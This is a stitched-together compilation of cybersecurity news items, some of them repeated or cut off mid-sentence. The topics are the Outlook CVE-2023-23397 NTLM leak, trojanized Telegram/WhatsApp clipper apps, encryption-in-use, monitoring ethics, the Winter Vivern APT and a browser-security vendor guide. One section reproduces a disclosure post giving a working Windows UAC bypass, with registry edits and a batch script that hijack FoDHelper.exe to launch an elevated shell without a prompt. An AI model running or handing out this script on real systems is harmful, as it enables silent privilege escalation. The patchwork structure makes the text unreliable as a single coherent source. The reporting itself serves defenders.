Snowballing PoC exploits for CVE-2023-23397 and a massive attack surface means almost business user could be a victim.

Microsoft recently patched a zero-day vulnerability under active exploit in Microsoft Outlook, identified as CVE-2023-23397, which could enable an attacker to perform a privilege escalation, accessing the victim's Net-NTLMv2 challenge-response authentication hash and impersonating the user.

Now it's becoming clear that CVE-2023-23397 is dangerous enough to become the most far-reaching bug of the year, security researchers are warning. Since disclosure just three days ago, more proof-of-concept (PoC) exploits have sprung onto the scene, which are sure to translate into snowballing criminal interest — helped along by the fact that no user interaction is required for exploitation.

If patching isn't possible quickly, there are some options for addressing the issue, noted below.

**Easy Exploit: No User Interaction Necessary**

The vulnerability allows the attackers to steal NTLM authentication hashes by sending malicious Outlook notes or tasks to the victim. These trigger the exploit automatically when they're retrieved and processed by the Outlook client, which could lead to exploitation before the email is viewed in the Preview Pane. In other words, a target doesn’t actually have to open the email to fall victim to an attack.

Discovered by researchers from Ukraine's Computer Emergency Response Team (CERT) and by one of Microsoft’s own researchers — and patched earlier this week as part of Microsoft's Patch Tuesday update — the bug affects those running an Exchange server and the Outlook for Windows desktop client. Outlook for Android, iOS, Mac, and Outlook for Web (OWA) are unaffected.

"External attackers could send specially crafted emails that will cause a connection from the victim to an external UNC location of attackers' control," says Mark Stamford, founder and CEO of OccamSec. This will leak the Net-NTLMv2 hash of the victim to the attacker, who can then relay this to another service and authenticate as the victim, he explains.

**A Range of Potential Exploit Impacts**

Nick Ascoli, founder and CEO of Foretrace, points out while Microsoft didn't mention how the criminals were using it within their attacks, it allows the reuse of the stolen authentication to connect to other computers over the network for lateral movement.

"The range of possible attacks could go from data exfiltration to potentially installing malware, depending on the permissions of the victim," he says.

Bud Broomhead, CEO at Viakoo, notes that "the likely victims are ones most susceptible to business email compromise (BEC) and to having their identity used for other forms of exploits." He points out there are a few areas that this potentially impacts, the most serious being identity management and trust of internal email communications.

"The risks also include breaching of core IT systems, distribution of malware, business email compromise for financial gain, and disruption of business operations and business continuity," Broomhead cautions.

**Is This the "It" Bug of 2023?**

Viakoo's Broomhead says that while at this point in 2023 there could be many possible "It" bugs coming from Microsoft, this is certainly a contender.

"Because it impacts organizations of all types and sizes, has disruptive methods of mitigation, and training employees on it won’t stop it, this could be a vulnerability that requires more significant effort to mitigate and remediate," he explains.

He notes the attack surface is at least as big as the user base of desktop Outlook (massive), and potentially core IT systems connected to Windows 365 (very massive), and even any recipients of emails sent through Outlook (pretty much everyone).

Then as mentioned, the PoCs that are circulating makes the situation even more attractive to cybercriminals.

"Since the vulnerability is public and instructions for a proof-of-concept are well documented now, other threat actors may adopt the vulnerability in malware campaigns and target a more widespread audience," adds Daniel Hofmann, CEO of Hornetsecurity. "Overall, exploiting the vulnerability is simple, and public proofs-of-concept can already be found on GitHub and other open forums."

What should businesses do? They may have to look beyond patching, Broomhead warns: "Mitigation in this case is difficult, as it causes disruption in how emails systems and users within it are configured."

**How to Protect Against CVE-2023-23397**

For those unable to patch right away, Hornetsecurity's Hofmann says that to better protect the organization, administrators should block TCP 445/SMB outbound traffic to the Internet from the network using perimeter firewalls, local firewalls, and VPN settings.

"This action prevents the transmission of NTLM authentication messages to remote file shares, helping to address CVE-2023-23397," he explains.

Organizations should also add users to the "Protected Users Security Group" in Active Directory to prevent NTLM as an authentication mechanism.

"This approach simplifies troubleshooting compared to other methods of disabling NTLM," Broomhead says. "It is particularly useful for high-value accounts, such as domain administrators."

He points out Microsoft has provided a script to identify and clean up or remove Exchange messages with UNC paths in message properties, and it advises administrators to apply the script to determine if they have been affected by the vulnerability and to remediate it.

Microsoft Outlook Vulnerability Could Be 2023's 'It' Bug

By Deeba Ahmed
Currently, the scam targets users who speak Chinese.
This is a post from HackRead.com Read the original post: Fake Telegram and WhatsApp clones aim at crypto on Android and Windows

ESET cybersecurity researchers have discovered trojanized instant messaging apps that deliver clippers malware. According to their analysis, these Android and Windows-based clippers can abuse instant messages and steal crypto wallet funds via OCR (optical character recognition).

This is the first time clippers have been discovered disguised as instant messaging apps.

**Dozens of Fake Messaging Apps Discovered**

Based on the findings shared by ESET researchers, dozens of fake Telegram and WhatsApp websites have surfaced. These websites primarily target Windows and Android users and deliver weaponized versions of Telegram and WhatsApp instant messaging apps loaded with a type of malware that modifies clipboard content, called Clippers.

Clippers were first discovered on the Google Play Store **in 2019**, and now they have been built into messaging apps.

The infection chain (ESET)

**What are Clippers?**

Clippers refer to malicious codes, also called clipper copies, that can alter a device’s clipboard content, which in the latest campaign leads the attackers to access their victims’ cryptocurrency wallets.

This happens because online cryptocurrency wallets’ addresses comprise long strings of characters, and users often copy/paste these addresses via the clipboard instead of entering them.

Clippers can recognize the text and help attackers steal crypto by intercepting the clipboard data and secretly replacing wallet addresses with those that can be accessed by criminals.

> “The main purpose of the clippers is to intercept the victim’s messaging communications and replace any sent and received cryptocurrency wallet addresses with addresses belonging to the attackers,”
> 
> ESET

Researchers Lukáš Štefanko and Peter Strýček **wrote** that Clippers are mainly launched to steal cryptocurrency, and many of them can target cryptocurrency wallets. These apps use OCR to recognize text from screenshots the user has stored on the device. This is also the first time this kind of tactic is used.

**How are Users Targeted?**

In their latest campaign, clipper operators are targeting Chinese-speaking users. They distribute the **malware by creating Google Ads** that lure users to fake YouTube channels, from where they are redirected to fake WhatsApp and Telegram websites.

Once a clipper infects a device, it uses OCR to find and steal seed phrases. For this, the apps leverage a legitimate machine learning plugin called ML Kit on Android.

Another clipper cluster tracks Telegram conversations for Chinese cryptocurrency-related keywords, either received from a server or hard-coded. If found, the cluster exfiltrates the complete message with channel name, username, and group name to a remote server.

The fourth cluster of Android clippers can switch the wallet address and steal device data and Telegram data like contacts and messages.

Fake Telegram and WhatsApp sites (ESET)

The names of **malicious Android APK packages** are as follows:

*   com.whatsapp
*   org.tgplus.messenger
*   org.telegram.messenger
*   io.busniess.va.whatsapp
*   org.telegram.messenger.web2

ESET also discovered two Windows clusters. One could swap wallet addresses, and the other distributed RATs (remote access trojans), most based on GH0st RAT, in place of clippers to hijack infected hosts and steal crypto.”

Fake Telegram and WhatsApp clones aim at crypto on Android and Windows

If the approaches stand up to scrutiny, companies may soon be able to encrypt most databases in a way that allows using data without needing to decrypt to plaintext.

Pervasive encryption that protects data not just in transit and at rest, but in use — thus freeing companies of the fear of data breaches — has long been a dream of business executives, IT teams, and compliance professionals.

In 2023, those dreams may become a practical reality, with a number of database and data-security firms releasing software to allow companies to keep data encrypted while still allowing common operations, such as searching. Last year, for example, database-technology provider MongoDB released a preview of its Queryable Encryption capability, which allows companies to search for data records in "expressive" ways without needing to decrypt the data. And, this week, data security firm Vaultree released a software development kit to allow application makers to try its Data-in-Use Encryption feature, which — the company claims — allows more extensive operations on encrypted data.

The goal is to allow companies and their applications the ability to access and search databases efficiently, while preventing unauthorized users from ever decrypting sensitive information, says Kenn White, security principal at MongoDB.

"What we hear a lot from customers is concerns around leaks, breaches, and attacks on public cloud infrastructure, including privileged users, and so we're focused on areas where we can add additional security controls and technical measures to limit who can see sensitive data in real time," he says. "\[W\]e believe \[encryption-in-use\] will continue to be an area with a lot of potential for innovation, particularly for operational workloads."

The technologies promise to help organizations minimize the so-called "blast radius" when a network or system is compromised. Typically, businesses suffering a breach face a cascade of forensic investigations, regulatory filings and fines, and the potential exposure of sensitive data and intellectual property. Encrypted data allows companies to sidestep many of the devastating impacts of a breach, but has typically required complex data architecture designs to make sure plaintext information is not inadvertently left insecure.

Many technology companies have attempted to solve the problem and allow the secure use of data by applications by extending the use of encryption. In the 2010s, for example, Ionic Security aimed to encrypt all data on the fly and only allow its use by authorized users with specific privileges. Twilio bought the company in 2021.

If the current crop of technologies succeed where others have failed, companies could see significantly less risk in the event of a breach, says Ryan Lasmaili, CEO at Vaultree.

"We know if there's a leak, and the data is fully encrypted, it reduces the company's risk immediately to regulatory compliance," he says. "But GDPR right now, for example, does not cover data-in-use encryption, because to date, it has been seen as not being there yet."

**Avoiding Llamas in the Indy 500**

MongoDB's Queryable Encryption encrypts database fields, meaning that the information is cryptographically secure at all times, yet can still be used for searching. The keys for decrypting the information are stored with each client, giving only specific people and devices the ability to decrypt sensitive fields. Even a database administrator cannot decrypt every field unless they have the proper keys.

    

A flow chart of how Queryable Encryption works. Source: MongoDB

Making the technologies a reality relied on research by small groups of academic cryptographers. Queryable Encryption, for example, came from the work of Seny Kamara and Tarik Moataz, both of Brown University, who went on to create a startup, Aroki Software, which was purchased by MongoDB in 2021.

The goal of Queryable Encryption is to deliver technology today that can handle queries that are actually useful and make the capability easy for developers, MongoDB's White said during a presentation at the USENIX ENIGMA Conference in January. Key to all that is that performance should not get in the way, he said.

"It has to be sub-linear — the difference between 1,000 documents, a million, 5 million, and 100 million documents, it should be sub-linear," he said. "A lot of the academic work had been done in a way that was super-linear, so works great on 10 records, or 100, 1,000, 5,000 — beyond that, it's painful. And you can throw more CPUs at it, but you know, it's kind of like racing the Indy 500 with llamas — there's only so much you can do."

Other technologies, like fully homomorphic encryption (FHE), promise to allow a more extensive range of operations on encrypted data and have been extensively funded by the US Department of Defense. A team from Intel and Microsoft signed a multiyear research grant with the DoD in 2021 under the DARPA Data Protection in Virtual Environments (DPRIVE) program to create a hardware accelerator to speed up the notorious processing-intensive FHE approaches. In January, Duality Technologies, another DPRIVE grant recipient, announced it was named to Phase 2 of that program to accelerate machine-learning processing on encrypted data.

"Structured encryption, like most encryption schemes, protects data confidentiality — this means that data is protected in a way where only people approved to receive the data actually have access to this data," says Kurt Rohloff, chief technology officer at Duality Technologies. "FHE also provides data confidentiality, but allows more processing on the data without requiring decryption."

**More Testing Needed**

New encryption models and technologies typically require a marathon of testing and evaluation. MongoDB's Queryable Encryption stemmed from academic research on structured encryption, with several papers describing the approach. FHE has had decades of research and open development. Vaultree's Data-in-Use Encryption remains, to a large degree, a black box, although CEO Lasmaili pledges that scientific papers will be forthcoming.

In a blog on the possibilities of pervasive encryption, cybersecurity firm Kaspersky warned that such technologies require a great deal of oversight, because even small missteps can undermine the security of the systems.

"This happens to be a common problem of practical cryptography — when the developers of an information system feel compelled to craft something in-house that meets their particular data encryption requirements," the company stated. "This 'something' then often turns out to be vulnerable because the development process failed to take into account the latest scientific research."

While encryption-in-use may claim an early lead because it is usable in its current state, breakthroughs in FHE may win in the long run, especially as quantum computing may end up being a differentiator. FHE continues to have functional and security benefits, especially in a post-quantum encryption world, says Duality Technologies' Rohloff.

"Fully homomorphic encryption does allow many more secure operations on it as compared to general structured encryption," he says. "Not all variations of structured encryption \[are\] protected against quantum computing attacks, but all used fully homomorphic encryption schemes are believed to be protected against quantum computing attacks."

Technology Firms Delivering Much-Sought Encryption-in-Use

The chances of getting hacked are no longer low. Companies need to rethink their data collection and monitoring strategies to protect employee privacy and corporate integrity.

Organizations monitor their computer networks for a host of reasons — from gaining insight into availability, performance, and failures, to identifying potential cybersecurity vulnerabilities and exploits. In the process, they often collect more data than actually needed on employees, customers, prospects, vendors, and more. The prevailing attitude is that because the data exists, is easy to capture, and relatively cheap to store, why not collect it? But given the expansive capabilities of today's technology, combined with how integrated it is in every aspect of our lives, there's a danger of either purposefully or inadvertently collecting unnecessary and private data.

**More Data Means More Risk**

This issue will only increase as monitoring technologies continue to improve and have the ability to gather wider perspectives and unique personal characteristics. As it stands, companies collect plenty of direct data on individuals and use third-party enrichment to add fuller details, some of which are more intrusive than necessary. As layer upon layer of diverse data is captured, it's likely the insights will increasingly cross privacy boundaries and create risk.

All data scooped up during monitoring — including financial information, communications, intellectual property, personnel files, contracts, and other confidential materials — has the potential to enter the public domain, either by hacking or human error. A recent cautionary tale is a Department of Defense server misconfiguration that spilled out email messages and sensitive personal details of federal employees. While this information was required for military security clearances, many companies are collecting similar data without a legitimate need, creating an unnecessary threat of exposure.

Hackers regularly exploit personal data to open up authentication information that allows them to monetize their cybercrimes, which has been made easier and more lucrative thanks to cryptocurrencies. There are also nation-state actors, corporate espionage, and even politically motivated organizations seeking to obtain intellectual property to better their position. This doesn't have to be a proprietary company secret. They may be seeking a process, application, engineering diagram, or even simple text messages.

**When Monitoring Seems Like Surveillance**

Another concern with excessive data collection is the impact on employees. When companies and vendors gain insights that are unnecessary to the core monitoring mission, it can alarm employees. This is especially true as the boundaries between work and home blend together, making personal devices increasingly available to corporate data collection.

Additionally, if the data being collected cannot be tracked to a specific goal, employees may mistake legitimate network and security monitoring for surveillance, especially as employee monitoring tools have become more widely used with the onset of remote work. These tools have a different purpose than network and security monitoring tools, but that's not always clear to workers.

**Taking Control of the Data**

When it comes to network and security monitoring, there's a strong case to be made for collecting and analyzing data at a discrete micro level. But when viewed at a macro level, where more personal and unnecessary information is collected and connected with other data sources, the case can lose its validity. This often happens when chief information officers (CIOs) and others get so caught up in monitoring technology's advanced capabilities that it clouds their good intentions and leads to questionable outcomes. Here are a few steps to help prevent data from getting the upper hand:

● As an organization, it's important to change how data is viewed. For many leaders, every data point is seen through a business mission lens and not from the perspective of privacy. The key is to identify each data point being collected and determine if it's a piece of core information or enrichment information. In most cases, data collected strictly for enrichment purposes is more difficult to justify.

● Given advancements in data analysis, it's not simply about reviewing the information being fed into the system. It's about how the algorithms are being trained, and what controls are in place to define what's confidential and how to keep it that way. Without those controls, the algorithm may use unnecessary data points, resulting in outputs that answer questions never intended to be asked.

● In addition to improving data consistency and quality, a data governance team can be invaluable in helping educate employees and others about what is and what isn't being monitored, and why. They can also develop and enforce company data policies and ensure compliance with standards and regulations to prevent privacy lines from being crossed.

● When it comes to vendors, there should be a clear directive that the data being collected needs to be tied to the services being provided. IT leaders should make these three requests of vendors:

—Provide a detailed account of all data being collected, how it's being collected, how often it's being collected, and how it's being used.

—Describe the access mechanism being used to collect data and determine if, and to what extent, it allows the collection of unnecessary data.

—Explain if there are options to opt out of having specific data points collected and, if so, any implications that may result if taken.

A thorough review of data monitoring and collection procedures will likely reveal that most organizations are overreaching and putting the company, its employees, and its customers at risk. It's time to accept that the chance of getting hacked today is no longer exceedingly low. This intensifies the need for companies to take the necessary steps to rethink their data collection and monitoring strategies, and put best practices in place to protect employee privacy and corporate integrity.

The Ethics of Network and Security Monitoring

The "underreported" APT has returned to focus after attacks promoting Russian and Belarusian government interests and going after targets with humor, zest, and scrappiness.

A politically motivated cyber threat that's hardly discussed in the public sphere has made a sort of comeback in recent months, with campaigns against government agencies and individuals in Italy, India, Poland, and Ukraine.

"Winter Vivern" (aka UAC-0114) has been active since at least December 2020. Analysts tracked its initial activity in 2021, but the group has remained out of the public eye in the years since. That is, until attacks against Ukrainian and Polish government targets inspired reports on resurgent activity earlier this year from the Central Cybercrime Bureau of Poland, and the State Cyber Protection Centre of the State Service of Special Communication and Information Protection of Ukraine.

In a follow-on analysis published this week, Tom Hegel, senior threat researcher at SentinelOne, further elucidated the group's TTPs and emphasized its close alignment "with global objectives that support the interests of Belarus and Russia's governments," noting that it should be classified as an advanced persistent threat (APT) even though its resources aren't on the par of its other Russian-speaking peers.

**Winter Vivern, a 'Scrappy' Threat Actor**

Winter Vivern, whose name is a derivative of the wyvern, a type of biped dragon with a poisonous, pointed tail "falls into a category of scrappy threat actors," Hegel wrote. They're "quite resourceful and able to accomplish a lot with potentially limited resources, while willing to be flexible and creative in their approach to problem solving."

The group's most defining characteristic is its phishing lures — usually documents mimicking legitimate and publicly available government literature, which drop a malicious payload upon being opened. More recently, the group has taken to mimicking government websites to distribute their nasties. Vivern has a sense of humor, mimicking homepages belonging to the primary cyber-defense agencies of Ukraine and Poland, as seen below.

Source: SentinelOne

The group's most tongue-in-cheek tactic, though, is to disguise its malware as antivirus software. Like their many other campaigns, "the fake scanners are pitched through email to targets as government notices," Hegel tells Dark Reading.

These notices instruct recipients to scan their machines with this supposed antivirus software. Victims who download the fake software from the fake government domain will see what appears to be an actual antivirus running, when, in fact, a malicious payload is being downloaded in the background.

That payload, in recent months, has commonly been Aperitif, a Trojan that collects details about victims, establishes persistence on a target machine, and beacons out to an attacker-controlled command-and-control server (C2).

Source: SentinelOne

The group employs many other tactics and techniques, too. In a recent campaign against Ukraine's I Want to Live hotline, they resorted to an old favorite: a macro-enabled Microsoft Excel file.

And "when the threat actor seeks to compromise the organization beyond the theft of legitimate credentials," Hegel wrote in his post, "Winter Vivern tends to rely on shared toolkits and the abuse of legitimate Windows tools."

**Winter Vivern, APT, or Hacktivists?**

The Winter Vivern story is scattershot and leads to a somewhat confused profile.

Its targets are pure APT: Early in 2021, researchers from DomainTools were parsing Microsoft Excel documents using macros when they came upon one with a rather innocuous name: "contacts." The contacts macro dropped a PowerShell script that contacted a domain that'd been active since December 2020. Upon further investigation, the researchers discovered more than they'd bargained for: other malicious documents targeting entities within Azerbaijan, Cyprus, India, Italy, Lithuania, Ukraine, and even the Vatican.

The group was clearly still active by the summertime, when Lab52 published news of an ongoing campaign matching the same profile. But it wasn't until January 2023 that it resurfaced in the public eye, following campaigns against individual members of the Indian government, the Ukraine Ministry of Foreign Affairs, the Italy Ministry of Foreign Affairs, and other European government agencies.

"Of particular interest," Hegel noted in his blog post, "is the APT's targeting of private businesses, including telecommunications organizations that support Ukraine in the ongoing war."

This special emphasis on Ukraine adds intrigue to the story since, as recently as February, the Ukraine government was only able to conclude "with a high level of confidence" that "Russian-speaking members are present" within the group. Hegel has now gone a step further, by directly correlating the group with Russian and Belarusian state interests.

"With the potential ties into Belarus, it's challenging to determine if this is a new organization or simply new tasking from those we know well," Hegel tells Dark Reading.

Even so, the group doesn't fit the profile of a typical nation-state APT. Their lack of resources, their "scrappiness" — relative to their heavy-hitting counterparts like Sandworm, Cozy Bear, Turla, and others — place them in a category nearer to more ordinary hacktivism. "They do possess technical skills to accomplish initial access, however, at this time they don't stack up to highly novel Russian actors," Hegel says.

Beyond the limited capacities, "their very limited set of activity and targeting is why they are so unknown in the public," Hegel says. It may be in Winter Vivern's favor, in the end. So long as it lacks that extra bite, it may continue to fly under the radar.

Low-Budget 'Winter Vivern' APT Awakens After 2-Year Hibernation

This write up is an overview of how Microsoft's attempts to manage elevated access to executables via registry entries has added over complexity that still allows for escalation.

    Hi @ll,with Windows 2000, Microsoft virtualised the [HKEY_CLASSES_ROOT] registrybranch: what was just an alias for [HKEY_LOCAL_MACHINE\SOFTWARE\Classes]before became the overlay of [HKEY_LOCAL_MACHINE\SOFTWARE\Classes] and[HKEY_CURRENT_USER\Software\Classes] with the latter having precedence:<https://msdn.microsoft.com/en-us/library/ms724498.aspx>Note: while [HKEY_LOCAL_MACHINE\SOFTWARE\Classes] is writable only by      (privileged) administrators, [HKEY_CURRENT_USER\Software\Classes]      is writable by the (current) unprivileged user.With Windows Vista they introduced the "security theatre" called"User Account Control" (a far better name is "qUACkery"):<https://blogs.msdn.microsoft.com/uac/2005/12/08/user-account-control/>| User Account Protection was the preliminary name for a core security| component of Windows Vista. The component has now been officially named| User Account Control (UAC).The qUACkery sort of lobotomises administrator accounts and splits theirbrain^Waccess token: the "shell", i.e. EXPLORER.exe, and all programs runfrom it use a restricted access token without administrative privileges.For the (not so few) programs which but need administrative privileges,Microsoft introduced a "kill switch" in the application manifest:<https://msdn.microsoft.com/en-us/library/aa374191.aspx><https://msdn.microsoft.com/en-us/library/bb756929.aspx>| <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">|    <security>|       <requestedPrivileges>|          <requestedExecutionLevel level="requireAdministrator" uiAccess="false" />|       </requestedPrivileges>|    </security>| </trustInfo>With this loop^Wwormhole, the virtualised [HKEY_CLASSES_ROOT] introducedwith Windows 2000 became but a can of worms: in STANDARD installations ofWindows, applications running with administrative privileges, i.e. anintegrity level above "Medium", now evaluate registry settings (COM CLSIDs,ProgIDs, URL protocols, ...) which are under control of the unprivilegeduser.<https://msdn.microsoft.com/en-us/library/ms724498.aspx>| If an application is run with administrator rights and User Account| Control is disabled, the COM runtime ignores per-user COM configuration| and accesses only per-machine COM configuration.<https://msdn.microsoft.com/en-us/library/bb756926.aspx>| Beginning with Windows Vista® and Windows Server® 2008, if the| integrity level of a process is higher than Medium, the COM runtime| ignores per-user COM configuration and accesses only per-machine| COM configuration. This action reduces the surface area for elevation| of privilege attacks, preventing a process with standard user privileges| from configuring a COM object with arbitrary code and having this code| called from an elevated process.OOPS: COM CLSIDs have been removed from the can of worms.But what about ProgIDs and URL protocols?<https://msdn.microsoft.com/en-us/library/cc144152.aspx>Demonstration:~~~~~~~~~~~~~~1) Start the command processor in the user account created during   Windows setup;2) Execute the "Feature on Demand" helper application FoDHelper.exe   (which requires administrative privileges, but elevates SILENTLY),   then close the "Immersive Control Panel" window it opened;3) Add the following registry entries to replace the application run   by the elevated FoDHelper.exe from "Immersive Control Panel" to   "Windows Command Processor" (or an arbitrary other one):   [HKEY_CURRENT_USER\Software\Classes\qUACkery\Shell\Open\Command]   @="C:\\Windows\\System32\\Cmd.exe"   [HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer]   @="qUACkery"4) Execute FoDHelper.exe again;5) Remove the registry entries created in step 3.If you prefer a batch script:--- quackery.cmdREG.exe ADD "HKEY_CURRENT_USER\Software\Classes\qUACkery\Shell\Open\Command" /VE /T REG_SZ /D "%COMSPEC%" /FREG.exe ADD "HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer" /VE /T REG_SZ /D "qUACkery" /FFoDHelper.exeREG.exe DELETE "HKEY_CURRENT_USER\Software\Classes\MS-Settings" /FREG.exe DELETE "HKEY_CURRENT_USER\Software\Classes\qUACkery" /F--- EOF ---OOPS: Windows Defender blocks the execution of FoDHelper.exeSpoiler: installation of another anti-virus, for example McAfee,         Bitdefender, Eset, Sophos, Avira, AVG/Avast, TrendMicro,         deactivates Windows Defender and lets FoDHelper.com run         an arbitrary application elevated, without UAC prompt.stay tuned, and far away from the eternally vulnerable crap oozing out of RedmondStefan KanthakPS: finding the applications which call the ProgIDs/URL protocols    ms-settings-airplanemode, ms-settings-bluetooth, ms-settings-cellular,    ms-settings-connectabledevices, ms-settings-displays-topology,    ms-settings-emailandaccounts, ms-settings-language, ms-settings-location,    ms-settings-lock, ms-settings-mobilehotspot, ms-settings-notifications,    ms-settings-power, ms-settings-privacy, ms-settings-proximity,    ms-settings-screenrotation, ms-settings-wifi, ms-settings-workplace    is left as an exercise to the reader.PPS: for all these URL protocols, the wise guys from Redmond added the     following registry entries to ease their exploitation:     [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ProtocolExecute\ms-settings]     "WarnOnOpen"=dword:00000000     ...     [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ProtocolExecute\ms-settings-workplace]     "WarnOnOpen"=dword:00000000

Microsoft User Account Control Nuances

In the modern corporate IT environment, which relies on cloud connectivity, global connections and large volumes of data, the browser is now the most important work interface. The browser connects employees to managed resources, devices to the web, and the on-prem environment to the cloud one.
Yet, and probably unsurprisingly, this browser prominence has significantly increased the number of

Browser Security / Endpoint Protection

In the modern corporate IT environment, which relies on cloud connectivity, global connections and large volumes of data, the browser is now the most important work interface. The browser connects employees to managed resources, devices to the web, and the on-prem environment to the cloud one.

Yet, and probably unsurprisingly, this browser prominence has significantly increased the number of threats that adversaries target the browser with. Attackers are now leveraging the browser's core functionality - rendering and executing web pages for users to access - to perform attacks. The browser is now an attack surface, as well as an attack vector for malicious access to corporate SaaS and web applications through account takeover and the use of compromised credentials.

To address this issue, a new guide was recently published (**Download Here**). It analyzes what a solution to these threats would look like. The guide, "Protection from web-borne threats starts with Browser Security Platform," details the characteristics and the capabilities of a potential solution, and explains how it compares to other security solutions and why it is needed.

**You Can't Protect From Web-borne Risks From Outside the Browser**

Commonly used security solutions were not natively built for protecting web sessions. For example:

*   A network solution that analyzes web traffic to prevent access to malicious websites can't detect over 40% of today's adversaries-controlled web pages.
*   CASB doesn't have any monitoring and threat detection capabilities for unsanctioned applications and other non-corporate web destinations.
*   Endpoint Protection Platform (EPP) doesn't have visibility into the installment of browser extensions

Instead, protection to web-borne risk has to come from within the browser itself.

**The Solution: Browser Security Platform**

The guide calls for the recognition of an emerging security solution category, Browser Security Platform, which provides visibility into the browser's application layer. This visibility is provided by continuously monitoring, analyzing, and applying real-time security controls on browser sessions from the browser itself.

Main characteristics of Browser Security Platform include:

*   **Browser-agnostic** - the ability to equally support any browser it might encounter.
*   **Converged** - the ability to analyze the post-decrypted web session, detect and prevent web-borne attacks in real time, prevent unintentional data loss, and enable IT governance.
*   **Comprehensive** - addresses all aspects of the browser security: the browser itself, user activities and preventing attacker-controlled web pages.
*   **Deep web session inspection** -real-time monitoring, risk analysis and proactive protection on the actual, post-decryption web session itself.
*   **User-centric** \- the maintenance of a seamless user experience and preservation of user privacy.

**Browser Security Platform Core Capabilities**

Following the detailed characteristics, the guide then lists the core capabilities of browser Security Platform. The main ones are:

*   Secure browser configuration and attack surface reduction
*   Zero trust in the browser
*   360° SaaS and web security
*   Protection from browser-borne attacks, phishing webpages and malicious websites
*   Protect unmanaged devices and BYOD

Adapting and responding to any future web-based risks.

The guide itself provides more granular details about each capability and how businesses can leverage them.

**The Benefits of Browser Security Platform**

Why should businesses look into a Browser Security Platform? The guide doesn't shy away from tackling the hard questions. The writers know that CISOs have to justify budgets to the board and evangelize internally. Therefore, they list the main benefits Browser Security Platform provides for businesses.

The main ones are work flexibility for employees, consolidation of browser security controls, regained control of unmanaged resources, consistency of protection across all web and SaaS applications and support for a cloud-first strategy.

**What is Not Browser Security Platform?**

Finally, the guide provides insights into how to detect a Browser Security Platform. As an evolving category, the concept of Browser Security Platform is not always well understood by both security stakeholders and solution vendors alike.

Some examples of common mistakes regarding the nature of this new product category are perceiving it as a virtual machine for web-pages emulation, as an enhancer of endpoint protection solutions, or a solution that replaces commercial browsers. That is not the case, and the guide details why.

**Main Takeaways from the Browser Security Platform Guide**

The journey to protecting from web-borne risks and threats has started long ago. The question to explore today is where the most urgent gaps are. They might be the partial visibility across unsanctioned applications or the failure from preventing employees from accessing malicious web pages. There are a multitude of protection challenges for the browser.

The Browser Security Platform guide provides a directive for identifying how security stakeholders can address these gaps. The unique guide provides granular detail into how a solution would work and what stakeholders would stand to benefit.

Read the **complete guide here**.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

A New Security Category Addresses Web-borne Threats

Copycat websites for instant messaging apps like Telegram and WhatApp are being used to distribute trojanized versions and infect Android and Windows users with cryptocurrency clipper malware.
"All of them are after victims' cryptocurrency funds, with several targeting cryptocurrency wallets," ESET researchers Lukáš Štefanko and Peter Strýček said in a new analysis.
While the first instance of

Cryptocurrency / Mobile Security

Copycat websites for instant messaging apps like Telegram and WhatApp are being used to distribute trojanized versions and infect Android and Windows users with cryptocurrency clipper malware.

"All of them are after victims' cryptocurrency funds, with several targeting cryptocurrency wallets," ESET researchers Lukáš Štefanko and Peter Strýček said in a new analysis.

While the first instance of clipper malware on the Google Play Store dates back to 2019, the development marks the first time Android-based clipper malware has been built into instant messaging apps.

"Moreover, some of these apps use optical character recognition (OCR) to recognize text from screenshots stored on the compromised devices, which is another first for Android malware."

The attack chain begins with unsuspecting users clicking on fraudulent ads on Google search results that lead to hundreds of sketchy YouTube channels, which then direct them to lookalike Telegram and WhatsApp websites.

What's novel about the latest batch of clipper malware is that it's capable of intercepting a victim's chats and replacing any sent and received cryptocurrency wallet addresses with addresses controlled by the threat actors.

Another cluster of clipper malware makes use of OCR to find and steal seed phrases by leveraging a legitimate machine learning plugin called ML Kit on Android, thereby making it possible to empty the wallets.

A third cluster is designed to keep tabs on Telegram conversations for certain Chinese keywords, both hard-coded and received from a server, related to cryptocurrencies, and if so, exfiltrate the complete message, along with the username, group or channel name, to a remote server.

Lastly, a fourth set of Android clippers come with capabilities to switch the wallet address as well as harvest device information and Telegram data such as messages and contacts.

The rogue Android APK package names are listed below -

*   org.telegram.messenger
*   org.telegram.messenger.web2
*   org.tgplus.messenger
*   io.busniess.va.whatsapp
*   com.whatsapp

ESET said it also found two Windows clusters, one which is engineered to swap wallet addresses and a second group that distributes remote access trojans (RATs) in place of clippers to gain control of infected hosts and perpetrate crypto theft.

WEBINAR

Discover the Hidden Dangers of Third-Party SaaS Apps

Are you aware of the risks associated with third-party app access to your company's SaaS apps? Join our webinar to learn about the types of permissions being granted and how to minimize risk.

RESERVE YOUR SEAT

All the analyzed RAT samples are based on the publicly available Gh0st RAT, barring one, which employs more anti-analysis runtime checks during its execution and uses the HP-socket library to communicate with its server.

It's also worth pointing out that these clusters, despite following a similar modus operandi, represent disparate sets of activity likely developed by different threat actors.

The campaign, like a similar malicious cyber operation that came to light last year, is geared towards Chinese-speaking users, primarily motivated by the fact that both Telegram and WhatsApp are blocked in the country.

"People who wish to use these services have to resort to indirect means of obtaining them," the researchers said. "Unsurprisingly, this constitutes a ripe opportunity for cybercriminals to abuse the situation."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Lookalike Telegram and WhatsApp Websites Distributing Cryptocurrency Stealing Malware

The advanced persistent threat known as Winter Vivern has been linked to campaigns targeting government officials in India, Lithuania, Slovakia, and the Vatican since 2021.
The activity targeted Polish government agencies, the Ukraine Ministry of Foreign Affairs, the Italy Ministry of Foreign Affairs, and individuals within the Indian government, SentinelOne said in a report shared with The

The advanced persistent threat known as **Winter Vivern** has been linked to campaigns targeting government officials in India, Lithuania, Slovakia, and the Vatican since 2021.

The activity targeted Polish government agencies, the Ukraine Ministry of Foreign Affairs, the Italy Ministry of Foreign Affairs, and individuals within the Indian government, SentinelOne said in a report shared with The Hacker News.

"Of particular interest is the APT's targeting of private businesses, including telecommunications organizations that support Ukraine in the ongoing war," senior threat researcher Tom Hegel said.

Winter Vivern, also tracked as UAC-0114, drew attention last month after the Computer Emergency Response Team of Ukraine (CERT-UA) detailed a new malware campaign aimed at state authorities of Ukraine and Poland to deliver a piece of malware dubbed Aperetif.

